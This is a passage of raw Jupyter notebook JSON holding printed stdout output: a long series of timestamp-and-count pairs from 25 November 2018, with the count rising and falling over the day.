"['2018-11-25 10:25:45.487463', 5]\n",
"['2018-11-25 10:26:01.095411', 6]\n",
"['2018-11-25 10:26:03.096949', 7]\n",
"['2018-11-25 10:30:01.817589', 8]\n",
"['2018-11-25 10:30:33.411007', 9]\n",
"['2018-11-25 10:30:35.596195', 10]\n",
"['2018-11-25 10:31:10.887570', 11]\n",
"['2018-11-25 10:32:10.391446', 10]\n",
"['2018-11-25 10:33:06.523263', 11]\n",
"['2018-11-25 10:33:16.206054', 12]\n",
"['2018-11-25 10:34:10.732514', 13]\n",
"['2018-11-25 10:34:12.021563', 14]\n",
"['2018-11-25 10:34:33.412208', 13]\n",
"['2018-11-25 10:34:57.894007', 14]\n",
"['2018-11-25 10:35:22.755320', 13]\n",
"['2018-11-25 10:36:24.970646', 12]\n",
"['2018-11-25 10:37:01.508639', 11]\n",
"['2018-11-25 10:37:11.059489', 10]\n",
"['2018-11-25 10:37:35.838023', 9]\n",
"['2018-11-25 10:38:22.039040', 10]\n",
"['2018-11-25 10:38:35.287785', 11]\n",
"['2018-11-25 10:38:38.644723', 12]\n",
"['2018-11-25 10:38:48.854290', 13]\n",
"['2018-11-25 10:39:16.080078', 14]\n",
"['2018-11-25 10:39:22.127756', 15]\n",
"['2018-11-25 10:39:26.714773', 16]\n",
"['2018-11-25 10:39:49.629468', 17]\n",
"['2018-11-25 10:40:19.113787', 18]\n",
"['2018-11-25 10:40:35.022698', 19]\n",
"['2018-11-25 10:40:37.778244', 20]\n",
"['2018-11-25 10:40:40.635416', 21]\n",
"['2018-11-25 10:40:56.634151', 20]\n",
"['2018-11-25 10:41:08.109709', 19]\n",
"['2018-11-25 10:41:09.149281', 20]\n",
"['2018-11-25 10:41:12.832118', 19]\n",
"['2018-11-25 10:41:53.747245', 20]\n",
"['2018-11-25 10:42:06.193447', 19]\n",
"['2018-11-25 10:42:38.062808', 18]\n",
"['2018-11-25 10:44:02.818957', 16]\n",
"['2018-11-25 10:44:13.163031', 17]\n",
"['2018-11-25 10:44:17.857487', 16]\n",
"['2018-11-25 10:44:38.606217', 15]\n",
"['2018-11-25 10:44:52.379045', 14]\n",
"['2018-11-25 10:45:46.200159', 15]\n",
"['2018-11-25 10:45:48.613050', 16]\n",
"['2018-11-25 10:46:16.813109', 17]\n",
"['2018-11-25 10:46:32.519287', 16]\n",
"['2018-11-25 10:47:20.760195', 14]\n",
"['2018-11-25 10:47:50.847633', 13]\n",
"['2018-11-25 10:47:52.385085', 14]\n",
"['2018-11-25 10:48:09.496812', 15]\n",
"['2018-11-25 10:48:15.427877', 16]\n",
"['2018-11-25 10:48:20.858821', 15]\n",
"['2018-11-25 10:48:34.519243', 16]\n",
"['2018-11-25 10:49:24.596397', 15]\n",
"['2018-11-25 10:49:34.533931', 13]\n",
"['2018-11-25 10:49:54.520278', 12]\n",
"['2018-11-25 10:50:04.331414', 10]\n",
"['2018-11-25 10:50:16.927520', 9]\n",
"['2018-11-25 10:50:24.532913', 8]\n",
"['2018-11-25 10:50:35.170922', 7]\n",
"['2018-11-25 10:52:02.829773', 6]\n",
"['2018-11-25 10:53:35.212633', 4]\n",
"['2018-11-25 10:58:08.707999', 3]\n",
"['2018-11-25 10:59:54.403436', 4]\n",
"['2018-11-25 11:00:29.121034', 5]\n",
"['2018-11-25 11:09:08.445127', 3]\n",
"['2018-11-25 11:11:42.527471', 4]\n",
"['2018-11-25 11:12:55.412229', 5]\n",
"['2018-11-25 11:13:50.309015', 6]\n",
"['2018-11-25 11:13:52.976725', 7]\n",
"['2018-11-25 11:14:45.722057', 8]\n",
"['2018-11-25 11:15:33.844808', 9]\n",
"['2018-11-25 11:15:44.566469', 8]\n",
"['2018-11-25 11:17:19.343809', 9]\n",
"['2018-11-25 11:17:53.249007', 10]\n",
"['2018-11-25 11:18:58.517020', 9]\n",
"['2018-11-25 11:20:36.288344', 8]\n",
"['2018-11-25 11:20:44.463395', 9]\n",
"['2018-11-25 11:20:45.270808', 10]\n",
"['2018-11-25 11:20:46.875659', 11]\n",
"['2018-11-25 11:20:50.289328', 12]\n",
"['2018-11-25 11:20:55.148072', 13]\n",
"['2018-11-25 11:20:58.057267', 14]\n",
"['2018-11-25 11:21:14.466730', 15]\n",
"['2018-11-25 11:21:16.332182', 16]\n",
"['2018-11-25 11:21:35.798469', 17]\n",
"['2018-11-25 11:21:40.209876', 18]\n",
"['2018-11-25 11:21:53.261915', 17]\n",
"['2018-11-25 11:22:09.399837', 16]\n",
"['2018-11-25 11:22:19.669524', 17]\n",
"['2018-11-25 11:22:35.983501', 18]\n",
"['2018-11-25 11:22:36.304190', 17]\n",
"['2018-11-25 11:23:05.385976', 18]\n",
"['2018-11-25 11:24:36.933110', 19]\n",
"['2018-11-25 11:24:48.393371', 20]\n",
"['2018-11-25 11:24:52.273105', 21]\n",
"['2018-11-25 11:25:12.579578', 20]\n",
"['2018-11-25 11:25:36.731366', 18]\n",
"['2018-11-25 11:25:55.411792', 19]\n",
"['2018-11-25 11:26:28.031054', 20]\n",
"['2018-11-25 11:26:34.307733', 21]\n",
"['2018-11-25 11:26:58.983486', 20]\n",
"['2018-11-25 11:27:28.286872', 19]\n",
"['2018-11-25 11:27:43.421022', 20]\n",
"['2018-11-25 11:27:56.717167', 19]\n",
"['2018-11-25 11:28:27.565923', 20]\n",
"['2018-11-25 11:28:38.497258', 21]\n",
"['2018-11-25 11:28:50.266388', 20]\n",
"['2018-11-25 11:29:08.642836', 19]\n",
"['2018-11-25 11:29:31.679790', 20]\n",
"['2018-11-25 11:29:46.040523', 19]\n",
"['2018-11-25 11:30:02.784616', 17]\n",
"['2018-11-25 11:30:44.554862', 18]\n",
"['2018-11-25 11:30:51.317935', 17]\n",
"['2018-11-25 11:31:17.929385', 16]\n",
"['2018-11-25 11:31:37.084080', 17]\n",
"['2018-11-25 11:32:11.673426', 18]\n",
"['2018-11-25 11:32:19.423896', 19]\n",
"['2018-11-25 11:33:04.438407', 18]\n",
"['2018-11-25 11:33:40.215377', 17]\n",
"['2018-11-25 11:34:22.126673', 16]\n",
"['2018-11-25 11:34:26.290878', 15]\n",
"['2018-11-25 11:34:38.141788', 14]\n",
"['2018-11-25 11:34:42.630728', 15]\n",
"['2018-11-25 11:35:01.172147', 11]\n",
"['2018-11-25 11:35:20.099653', 12]\n",
"['2018-11-25 11:35:34.327037', 13]\n",
"['2018-11-25 11:37:01.813754', 9]\n",
"['2018-11-25 11:37:29.989389', 8]\n",
"['2018-11-25 11:37:36.956526', 9]\n",
"['2018-11-25 11:37:43.833624', 10]\n",
"['2018-11-25 11:38:04.811312', 9]\n",
"['2018-11-25 11:39:30.810408', 7]\n",
"['2018-11-25 11:40:32.451259', 5]\n",
"['2018-11-25 11:41:00.740303', 6]\n",
"['2018-11-25 11:41:44.199392', 7]\n",
"['2018-11-25 11:43:32.463290', 6]\n",
"['2018-11-25 11:43:39.189065', 5]\n",
"['2018-11-25 11:45:44.740075', 4]\n",
"['2018-11-25 11:53:17.586354', 3]\n",
"['2018-11-25 11:59:14.239639', 4]\n",
"['2018-11-25 11:59:26.632459', 5]\n",
"['2018-11-25 12:00:42.451870', 6]\n",
"['2018-11-25 12:02:02.244141', 7]\n",
"['2018-11-25 12:03:25.463277', 8]\n",
"['2018-11-25 12:04:20.674865', 7]\n",
"['2018-11-25 12:05:54.029206', 6]\n",
"['2018-11-25 12:06:12.233645', 5]\n",
"['2018-11-25 12:06:17.590773', 6]\n",
"['2018-11-25 12:06:24.801712', 7]\n",
"['2018-11-25 12:06:29.408501', 8]\n",
"['2018-11-25 12:06:30.710019', 9]\n",
"['2018-11-25 12:06:32.165591', 10]\n",
"['2018-11-25 12:06:32.873904', 11]\n",
"['2018-11-25 12:06:42.186090', 12]\n",
"['2018-11-25 12:06:46.553628', 13]\n",
"['2018-11-25 12:06:52.910223', 14]\n",
"['2018-11-25 12:06:57.782097', 15]\n",
"['2018-11-25 12:07:16.657559', 16]\n",
"['2018-11-25 12:07:20.737768', 17]\n",
"['2018-11-25 12:07:30.823351', 16]\n",
"['2018-11-25 12:07:34.338372', 17]\n",
"['2018-11-25 12:07:51.235391', 18]\n",
"['2018-11-25 12:08:08.675136', 19]\n",
"['2018-11-25 12:09:02.257906', 20]\n",
"['2018-11-25 12:09:14.503653', 21]\n",
"['2018-11-25 12:09:33.611034', 22]\n",
"['2018-11-25 12:10:13.104379', 23]\n",
"['2018-11-25 12:10:46.243659', 22]\n",
"['2018-11-25 12:10:54.255601', 21]\n",
"['2018-11-25 12:10:59.733255', 22]\n",
"['2018-11-25 12:11:37.087722', 20]\n",
"['2018-11-25 12:11:57.097066', 19]\n",
"['2018-11-25 12:12:09.790842', 18]\n",
"['2018-11-25 12:12:11.104238', 19]\n",
"['2018-11-25 12:12:12.457402', 20]\n",
"['2018-11-25 12:12:18.172280', 21]\n",
"['2018-11-25 12:13:03.375092', 20]\n",
"['2018-11-25 12:13:22.952420', 19]\n",
"['2018-11-25 12:14:11.161633', 20]\n",
"['2018-11-25 12:14:15.088010', 19]\n",
"['2018-11-25 12:14:20.137478', 18]\n"
]
},
{
"name": "stdout",
"output_type": "stream",
"text": [
"['2018-11-25 12:14:38.957070', 19]\n",
"['2018-11-25 12:14:55.789802', 18]\n",
"['2018-11-25 12:15:00.825767', 17]\n",
"['2018-11-25 12:15:15.895102', 16]\n",
"['2018-11-25 12:15:22.372330', 17]\n",
"['2018-11-25 12:16:22.993488', 14]\n",
"['2018-11-25 12:18:32.562618', 13]\n",
"['2018-11-25 12:18:51.545363', 14]\n",
"['2018-11-25 12:18:54.011911', 15]\n",
"['2018-11-25 12:19:23.028712', 10]\n",
"['2018-11-25 12:19:29.423100', 11]\n",
"['2018-11-25 12:20:02.589540', 8]\n",
"['2018-11-25 12:20:10.376079', 9]\n",
"['2018-11-25 12:23:12.607053', 8]\n",
"['2018-11-25 12:24:11.904284', 7]\n",
"['2018-11-25 12:24:17.895164', 8]\n",
"['2018-11-25 12:25:11.148378', 9]\n",
"['2018-11-25 12:25:50.751532', 10]\n",
"['2018-11-25 12:28:14.670150', 7]\n",
"['2018-11-25 12:29:44.571959', 5]\n",
"['2018-11-25 12:30:29.645132', 4]\n",
"['2018-11-25 12:31:49.213343', 5]\n",
"['2018-11-25 12:32:44.355053', 6]\n",
"['2018-11-25 12:33:50.395237', 5]\n",
"['2018-11-25 12:37:00.292037', 4]\n",
"['2018-11-25 12:38:48.208682', 5]\n",
"['2018-11-25 12:39:22.331765', 4]\n",
"['2018-11-25 12:40:52.748225', 5]\n",
"['2018-11-25 12:44:09.782767', 6]\n",
"['2018-11-25 12:44:39.483030', 7]\n",
"['2018-11-25 12:46:40.974559', 5]\n",
"['2018-11-25 12:46:41.306353', 6]\n",
"['2018-11-25 12:46:46.956645', 7]\n",
"['2018-11-25 12:47:07.099253', 8]\n",
"['2018-11-25 12:48:20.642698', 7]\n",
"['2018-11-25 12:50:14.769287', 8]\n",
"['2018-11-25 12:50:27.008449', 9]\n",
"['2018-11-25 12:50:37.235908', 10]\n",
"['2018-11-25 12:50:40.125464', 11]\n",
"['2018-11-25 12:50:48.293611', 12]\n",
"['2018-11-25 12:51:13.624920', 11]\n",
"['2018-11-25 12:51:13.883350', 12]\n",
"['2018-11-25 12:51:29.758566', 13]\n",
"['2018-11-25 12:51:37.168586', 12]\n",
"['2018-11-25 12:51:41.122429', 11]\n",
"['2018-11-25 12:51:45.442338', 12]\n",
"['2018-11-25 12:51:53.435401', 13]\n",
"['2018-11-25 12:53:08.704857', 14]\n",
"['2018-11-25 12:53:22.471468', 13]\n",
"['2018-11-25 12:53:22.758449', 14]\n",
"['2018-11-25 12:53:22.864922', 15]\n",
"['2018-11-25 12:53:23.238945', 16]\n",
"['2018-11-25 12:53:35.015735', 17]\n",
"['2018-11-25 12:54:12.818946', 18]\n",
"['2018-11-25 12:54:25.156076', 19]\n",
"['2018-11-25 12:54:38.707376', 18]\n",
"['2018-11-25 12:54:40.884657', 19]\n",
"['2018-11-25 12:54:42.932432', 20]\n",
"['2018-11-25 12:54:49.721106', 21]\n",
"['2018-11-25 12:55:05.211782', 22]\n",
"['2018-11-25 12:55:12.456724', 23]\n",
"['2018-11-25 12:56:01.581668', 22]\n",
"['2018-11-25 12:56:23.173971', 23]\n",
"['2018-11-25 12:56:43.641137', 24]\n",
"['2018-11-25 12:56:45.788347', 23]\n",
"['2018-11-25 12:57:13.672975', 24]\n",
"['2018-11-25 12:57:17.001291', 23]\n",
"['2018-11-25 12:57:22.572769', 22]\n",
"['2018-11-25 12:57:45.059926', 23]\n",
"['2018-11-25 12:57:50.315712', 24]\n",
"['2018-11-25 12:58:43.367450', 25]\n",
"['2018-11-25 12:58:53.054707', 24]\n",
"['2018-11-25 12:59:17.136221', 23]\n",
"['2018-11-25 12:59:19.349314', 22]\n",
"['2018-11-25 12:59:19.651413', 23]\n",
"['2018-11-25 12:59:30.227467', 24]\n",
"['2018-11-25 12:59:55.351062', 23]\n",
"['2018-11-25 13:00:14.790895', 22]\n",
"['2018-11-25 13:01:01.571097', 21]\n",
"['2018-11-25 13:01:39.734816', 20]\n",
"['2018-11-25 13:02:25.908116', 18]\n",
"['2018-11-25 13:03:01.568510', 17]\n",
"['2018-11-25 13:03:42.731651', 15]\n",
"['2018-11-25 13:04:17.774469', 14]\n",
"['2018-11-25 13:04:22.556362', 11]\n",
"['2018-11-25 13:04:23.190018', 10]\n",
"['2018-11-25 13:04:43.745000', 8]\n",
"['2018-11-25 13:04:52.468485', 6]\n",
"['2018-11-25 13:04:54.680089', 7]\n",
"['2018-11-25 13:06:31.016216', 8]\n",
"['2018-11-25 13:06:36.190642', 9]\n",
"['2018-11-25 13:07:22.508465', 10]\n",
"['2018-11-25 13:07:25.394337', 11]\n",
"['2018-11-25 13:08:22.543701', 10]\n",
"['2018-11-25 13:09:04.631015', 9]\n",
"['2018-11-25 13:09:17.939587', 10]\n",
"['2018-11-25 13:10:13.454960', 9]\n",
"['2018-11-25 13:10:44.734964', 8]\n",
"['2018-11-25 13:12:41.116782', 7]\n",
"['2018-11-25 13:12:45.749798', 8]\n",
"['2018-11-25 13:12:49.022546', 9]\n",
"['2018-11-25 13:13:09.706976', 8]\n",
"['2018-11-25 13:13:24.533932', 7]\n",
"['2018-11-25 13:24:56.105670', 3]\n",
"['2018-11-25 13:25:44.810263', 4]\n",
"['2018-11-25 13:27:20.698910', 5]\n",
"['2018-11-25 13:30:08.997837', 6]\n",
"['2018-11-25 13:31:59.480589', 7]\n",
"['2018-11-25 13:32:15.322718', 8]\n",
"['2018-11-25 13:32:31.998284', 9]\n",
"['2018-11-25 13:33:07.264986', 10]\n",
"['2018-11-25 13:33:13.928119', 11]\n",
"['2018-11-25 13:35:13.911506', 10]\n",
"['2018-11-25 13:35:17.977766', 11]\n",
"['2018-11-25 13:35:18.791238', 12]\n",
"['2018-11-25 13:35:42.437332', 13]\n",
"['2018-11-25 13:36:21.978473', 14]\n",
"['2018-11-25 13:36:26.903878', 15]\n",
"['2018-11-25 13:36:28.071395', 16]\n",
"['2018-11-25 13:36:45.707433', 17]\n",
"['2018-11-25 13:36:54.383003', 18]\n",
"['2018-11-25 13:37:00.019593', 19]\n",
"['2018-11-25 13:37:18.667044', 20]\n",
"['2018-11-25 13:37:36.794676', 21]\n",
"['2018-11-25 13:37:45.392341', 20]\n",
"['2018-11-25 13:37:47.164686', 19]\n",
"['2018-11-25 13:38:00.418742', 20]\n",
"['2018-11-25 13:39:30.230895', 21]\n",
"['2018-11-25 13:39:38.605991', 22]\n",
"['2018-11-25 13:40:11.556128', 23]\n",
"['2018-11-25 13:40:59.879912', 22]\n",
"['2018-11-25 13:41:02.861836', 21]\n",
"['2018-11-25 13:41:21.742155', 19]\n",
"['2018-11-25 13:41:36.788360', 17]\n",
"['2018-11-25 13:41:42.394809', 16]\n",
"['2018-11-25 13:41:54.687326', 13]\n",
"['2018-11-25 13:41:54.872392', 14]\n",
"['2018-11-25 13:41:58.293520', 15]\n",
"['2018-11-25 13:42:01.422220', 14]\n",
"['2018-11-25 13:42:02.111895', 13]\n",
"['2018-11-25 13:42:04.710889', 14]\n",
"['2018-11-25 13:42:12.702066', 15]\n",
"['2018-11-25 13:42:33.644225', 16]\n",
"['2018-11-25 13:42:41.662593', 17]\n",
"['2018-11-25 13:42:42.613626', 18]\n",
"['2018-11-25 13:42:51.076065', 19]\n",
"['2018-11-25 13:42:56.657293', 20]\n",
"['2018-11-25 13:43:07.372198', 21]\n",
"['2018-11-25 13:43:12.166065', 20]\n",
"['2018-11-25 13:43:18.984366', 21]\n",
"['2018-11-25 13:43:19.119659', 22]\n",
"['2018-11-25 13:43:22.504293', 23]\n",
"['2018-11-25 13:43:22.564207', 24]\n",
"['2018-11-25 13:43:45.623870', 25]\n",
"['2018-11-25 13:43:54.007335', 26]\n",
"['2018-11-25 13:44:12.648086', 25]\n",
"['2018-11-25 13:44:19.552733', 26]\n",
"['2018-11-25 13:45:28.989417', 27]\n",
"['2018-11-25 13:45:58.980124', 26]\n",
"['2018-11-25 13:46:01.681140', 27]\n",
"['2018-11-25 13:46:02.551777', 26]\n",
"['2018-11-25 13:46:06.378307', 25]\n",
"['2018-11-25 13:46:13.059634', 24]\n",
"['2018-11-25 13:46:40.178638', 23]\n",
"['2018-11-25 13:46:51.164694', 22]\n",
"['2018-11-25 13:46:57.114893', 23]\n",
"['2018-11-25 13:47:03.660928', 20]\n",
"['2018-11-25 13:47:05.167786', 19]\n",
"['2018-11-25 13:47:34.346662', 17]\n",
"['2018-11-25 13:47:48.256421', 16]\n",
"['2018-11-25 13:48:00.354169', 15]\n",
"['2018-11-25 13:48:07.298780', 14]\n",
"['2018-11-25 13:48:11.595029', 15]\n",
"['2018-11-25 13:48:23.395968', 12]\n",
"['2018-11-25 13:48:35.515404', 13]\n",
"['2018-11-25 13:48:45.520116', 14]\n",
"['2018-11-25 13:48:58.348789', 15]\n",
"['2018-11-25 13:49:10.179310', 16]\n",
"['2018-11-25 13:49:26.455526', 17]\n",
"['2018-11-25 13:50:03.666754', 15]\n",
"['2018-11-25 13:51:08.885988', 14]\n",
"['2018-11-25 13:51:10.563657', 15]\n",
"['2018-11-25 13:51:22.784626', 14]\n",
"['2018-11-25 13:51:30.178487', 15]\n",
"['2018-11-25 13:51:37.231909', 16]\n",
"['2018-11-25 13:52:38.988748', 15]\n",
"['2018-11-25 13:52:48.576223', 14]\n",
"['2018-11-25 13:52:59.177169', 13]\n",
"['2018-11-25 13:53:02.910389', 12]\n",
"['2018-11-25 13:53:10.871992', 11]\n",
"['2018-11-25 13:53:20.924972', 10]\n",
"['2018-11-25 13:53:40.110575', 11]\n",
"['2018-11-25 13:54:16.460167', 10]\n",
"['2018-11-25 13:54:21.381095', 11]\n",
"['2018-11-25 13:55:34.797498', 8]\n",
"['2018-11-25 14:02:23.012192', 3]\n",
"['2018-11-25 14:09:42.111730', 4]\n",
"['2018-11-25 14:10:20.452347', 5]\n",
"['2018-11-25 14:10:41.737067', 6]\n",
"['2018-11-25 14:11:31.620997', 7]\n",
"['2018-11-25 14:11:37.218761', 8]\n",
"['2018-11-25 14:11:40.655095', 9]\n",
"['2018-11-25 14:12:02.580485', 10]\n",
"['2018-11-25 14:13:08.268994', 11]\n",
"['2018-11-25 14:14:04.532615', 10]\n",
"['2018-11-25 14:15:41.938141', 7]\n",
"['2018-11-25 14:16:01.420456', 8]\n",
"['2018-11-25 14:16:03.876221', 9]\n",
"['2018-11-25 14:16:19.690247', 10]\n",
"['2018-11-25 14:16:20.870714', 11]\n",
"['2018-11-25 14:16:22.663749', 12]\n",
"['2018-11-25 14:16:22.724824', 13]\n",
"['2018-11-25 14:16:23.196224', 14]\n",
"['2018-11-25 14:16:27.529774', 15]\n",
"['2018-11-25 14:16:27.841627', 16]\n",
"['2018-11-25 14:16:29.983069', 17]\n",
"['2018-11-25 14:16:31.214274', 18]\n",
"['2018-11-25 14:16:41.841472', 19]\n",
"['2018-11-25 14:16:46.977387', 20]\n",
"['2018-11-25 14:16:51.175607', 21]\n",
"['2018-11-25 14:16:59.104383', 22]\n",
"['2018-11-25 14:17:00.513797', 23]\n",
"['2018-11-25 14:17:05.372374', 24]\n",
"['2018-11-25 14:17:07.453703', 25]\n",
"['2018-11-25 14:17:12.360612', 24]\n",
"['2018-11-25 14:17:19.741841', 23]\n",
"['2018-11-25 14:17:35.506325', 24]\n",
"['2018-11-25 14:17:36.174484', 25]\n",
"['2018-11-25 14:17:37.332507', 26]\n",
"['2018-11-25 14:18:12.814464', 27]\n",
"['2018-11-25 14:18:13.863292', 28]\n",
"['2018-11-25 14:18:16.676001', 29]\n",
"['2018-11-25 14:18:17.854732', 30]\n",
"['2018-11-25 14:19:23.770640', 31]\n",
"['2018-11-25 14:19:27.338040', 32]\n"
]
},
{
"name": "stdout",
"output_type": "stream",
"text": [
"['2018-11-25 14:19:31.156130', 33]\n",
"['2018-11-25 14:19:55.971343', 32]\n",
"['2018-11-25 14:20:15.686638', 31]\n",
"['2018-11-25 14:20:20.556949', 32]\n",
"['2018-11-25 14:20:24.394946', 31]\n",
"['2018-11-25 14:20:36.366633', 32]\n",
"['2018-11-25 14:20:43.092658', 33]\n",
"['2018-11-25 14:20:46.402500', 34]\n",
"['2018-11-25 14:20:49.001153', 33]\n",
"['2018-11-25 14:20:59.202275', 32]\n",
"['2018-11-25 14:21:14.934248', 33]\n",
"['2018-11-25 14:21:22.982360', 34]\n",
"['2018-11-25 14:21:37.973052', 33]\n",
"['2018-11-25 14:22:02.219699', 32]\n",
"['2018-11-25 14:22:09.359296', 33]\n",
"['2018-11-25 14:22:17.876063', 32]\n",
"['2018-11-25 14:22:20.713961', 33]\n",
"['2018-11-25 14:22:40.032425', 34]\n",
"['2018-11-25 14:22:55.161990', 33]\n",
"['2018-11-25 14:22:59.061621', 34]\n",
"['2018-11-25 14:23:16.214253', 33]\n",
"['2018-11-25 14:23:28.033435', 32]\n",
"['2018-11-25 14:23:31.196545', 31]\n",
"['2018-11-25 14:23:44.904415', 32]\n",
"['2018-11-25 14:23:48.042247', 31]\n",
"['2018-11-25 14:24:11.260202', 30]\n",
"['2018-11-25 14:24:15.818732', 28]\n",
"['2018-11-25 14:24:17.969214', 27]\n",
"['2018-11-25 14:24:19.321039', 28]\n",
"['2018-11-25 14:24:24.853383', 27]\n",
"['2018-11-25 14:24:52.906654', 26]\n",
"['2018-11-25 14:24:58.083246', 25]\n",
"['2018-11-25 14:25:37.085893', 26]\n",
"['2018-11-25 14:25:42.579522', 27]\n",
"['2018-11-25 14:25:43.142780', 28]\n",
"['2018-11-25 14:25:57.356231', 29]\n",
"['2018-11-25 14:26:19.573491', 28]\n",
"['2018-11-25 14:26:51.480949', 29]\n",
"['2018-11-25 14:26:57.017580', 28]\n",
"['2018-11-25 14:27:07.378386', 29]\n",
"['2018-11-25 14:27:14.076851', 30]\n",
"['2018-11-25 14:27:15.255898', 31]\n",
"['2018-11-25 14:27:42.914014', 30]\n",
"['2018-11-25 14:28:08.306589', 29]\n",
"['2018-11-25 14:28:12.858617', 30]\n",
"['2018-11-25 14:29:36.805531', 20]\n",
"['2018-11-25 14:30:09.004379', 13]\n",
"['2018-11-25 14:30:18.369817', 12]\n",
"['2018-11-25 14:32:07.202474', 9]\n",
"['2018-11-25 14:32:14.956822', 4]\n",
"['2018-11-25 14:32:34.684062', 5]\n",
"['2018-11-25 14:33:31.971569', 6]\n",
"['2018-11-25 14:35:05.199022', 7]\n",
"['2018-11-25 14:35:13.557613', 8]\n",
"['2018-11-25 14:42:00.154995', 2]\n",
"['2018-11-25 14:43:29.386000', 3]\n",
"['2018-11-25 14:48:46.795093', 4]\n",
"['2018-11-25 14:49:59.881627', 3]\n",
"['2018-11-25 14:53:24.748425', 4]\n",
"['2018-11-25 14:53:47.184804', 5]\n",
"['2018-11-25 14:55:08.931557', 6]\n",
"['2018-11-25 14:59:13.745934', 3]\n",
"['2018-11-25 14:59:51.746604', 4]\n",
"['2018-11-25 15:01:23.843159', 5]\n",
"['2018-11-25 15:01:25.399194', 6]\n",
"['2018-11-25 15:01:26.930092', 7]\n",
"['2018-11-25 15:01:27.419303', 8]\n",
"['2018-11-25 15:01:30.294853', 9]\n",
"['2018-11-25 15:01:41.535220', 10]\n",
"['2018-11-25 15:01:47.600079', 11]\n",
"['2018-11-25 15:01:49.618320', 12]\n",
"['2018-11-25 15:02:05.882896', 13]\n",
"['2018-11-25 15:02:25.709629', 14]\n",
"['2018-11-25 15:02:31.952518', 15]\n",
"['2018-11-25 15:02:36.321661', 16]\n",
"['2018-11-25 15:02:48.391455', 17]\n",
"['2018-11-25 15:02:51.957636', 18]\n",
"['2018-11-25 15:03:07.437109', 19]\n",
"['2018-11-25 15:03:09.031298', 20]\n",
"['2018-11-25 15:03:15.081993', 19]\n",
"['2018-11-25 15:03:27.566362', 20]\n",
"['2018-11-25 15:03:35.575464', 21]\n",
"['2018-11-25 15:03:53.889515', 20]\n",
"['2018-11-25 15:04:03.607092', 21]\n",
"['2018-11-25 15:04:10.162891', 22]\n",
"['2018-11-25 15:04:35.298503', 23]\n",
"['2018-11-25 15:04:36.487215', 24]\n",
"['2018-11-25 15:05:13.429745', 25]\n",
"['2018-11-25 15:05:13.499098', 26]\n",
"['2018-11-25 15:05:22.066397', 25]\n",
"['2018-11-25 15:05:25.669331', 26]\n",
"['2018-11-25 15:05:52.583703', 24]\n",
"['2018-11-25 15:06:03.607051', 25]\n",
"['2018-11-25 15:06:32.811589', 26]\n",
"['2018-11-25 15:06:37.668454', 27]\n",
"['2018-11-25 15:06:42.714457', 28]\n",
"['2018-11-25 15:06:43.592486', 29]\n",
"['2018-11-25 15:06:49.842614', 30]\n",
"['2018-11-25 15:06:50.754577', 31]\n",
"['2018-11-25 15:07:04.096714', 30]\n",
"['2018-11-25 15:07:39.439029', 29]\n",
"['2018-11-25 15:07:51.759643', 30]\n",
"['2018-11-25 15:08:03.901677', 29]\n",
"['2018-11-25 15:08:07.131248', 30]\n",
"['2018-11-25 15:08:28.042438', 31]\n",
"['2018-11-25 15:08:32.391784', 30]\n",
"['2018-11-25 15:09:24.943420', 31]\n",
"['2018-11-25 15:09:54.309744', 30]\n",
"['2018-11-25 15:10:10.698681', 29]\n",
"['2018-11-25 15:10:12.285140', 30]\n",
"['2018-11-25 15:10:15.159688', 31]\n",
"['2018-11-25 15:10:15.703106', 32]\n",
"['2018-11-25 15:10:21.527341', 31]\n",
"['2018-11-25 15:10:44.497405', 30]\n",
"['2018-11-25 15:12:02.906794', 26]\n",
"['2018-11-25 15:13:10.549827', 20]\n",
"['2018-11-25 15:13:33.217106', 17]\n",
"['2018-11-25 15:13:52.429297', 13]\n",
"['2018-11-25 15:14:40.485367', 9]\n",
"['2018-11-25 15:15:19.984741', 5]\n",
"['2018-11-25 15:15:23.011141', 6]\n",
"['2018-11-25 15:23:01.089459', 4]\n",
"['2018-11-25 15:26:41.614612', 3]\n",
"['2018-11-25 15:27:41.745795', 2]\n",
"['2018-11-25 15:37:24.338561', 3]\n",
"['2018-11-25 15:38:10.578617', 4]\n",
"['2018-11-25 15:39:17.777974', 5]\n",
"['2018-11-25 15:41:22.335170', 6]\n",
"['2018-11-25 15:41:54.854899', 5]\n",
"['2018-11-25 15:43:36.598238', 4]\n",
"['2018-11-25 15:43:39.483488', 5]\n",
"['2018-11-25 15:43:57.722059', 6]\n",
"['2018-11-25 15:44:01.860659', 7]\n",
"['2018-11-25 15:44:07.121420', 8]\n",
"['2018-11-25 15:44:09.370716', 9]\n",
"['2018-11-25 15:44:11.468014', 10]\n",
"['2018-11-25 15:44:13.725426', 11]\n",
"['2018-11-25 15:44:15.880290', 12]\n",
"['2018-11-25 15:44:20.279596', 13]\n",
"['2018-11-25 15:44:24.518880', 14]\n",
"['2018-11-25 15:44:34.790011', 15]\n",
"['2018-11-25 15:44:35.969268', 16]\n",
"['2018-11-25 15:44:35.985210', 17]\n",
"['2018-11-25 15:44:37.946547', 18]\n",
"['2018-11-25 15:44:47.205140', 19]\n",
"['2018-11-25 15:44:50.008219', 20]\n",
"['2018-11-25 15:45:05.181733', 21]\n",
"['2018-11-25 15:45:06.212017', 22]\n",
"['2018-11-25 15:45:16.865297', 23]\n",
"['2018-11-25 15:45:20.190028', 24]\n",
"['2018-11-25 15:45:29.435841', 25]\n",
"['2018-11-25 15:45:30.371220', 26]\n",
"['2018-11-25 15:45:32.270608', 27]\n",
"['2018-11-25 15:45:40.271526', 28]\n",
"['2018-11-25 15:45:50.850364', 29]\n",
"['2018-11-25 15:46:28.474205', 28]\n",
"['2018-11-25 15:46:35.479323', 29]\n",
"['2018-11-25 15:46:59.018461', 30]\n",
"['2018-11-25 15:47:00.663861', 31]\n",
"['2018-11-25 15:47:05.093380', 32]\n",
"['2018-11-25 15:47:39.384698', 31]\n",
"['2018-11-25 15:47:41.339957', 30]\n",
"['2018-11-25 15:47:43.928071', 31]\n",
"['2018-11-25 15:48:04.803035', 32]\n",
"['2018-11-25 15:48:05.770927', 33]\n",
"['2018-11-25 15:48:09.445709', 32]\n",
"['2018-11-25 15:48:33.678132', 33]\n",
"['2018-11-25 15:48:41.389361', 30]\n",
"['2018-11-25 15:49:15.442730', 31]\n",
"['2018-11-25 15:49:30.467734', 30]\n",
"['2018-11-25 15:49:41.754564', 31]\n",
"['2018-11-25 15:49:58.615422', 30]\n",
"['2018-11-25 15:50:04.712450', 31]\n",
"['2018-11-25 15:50:35.339140', 32]\n",
"['2018-11-25 15:50:35.561231', 33]\n",
"['2018-11-25 15:50:41.924774', 32]\n",
"['2018-11-25 15:51:09.285654', 31]\n",
"['2018-11-25 15:51:19.167085', 32]\n",
"['2018-11-25 15:51:22.869853', 33]\n",
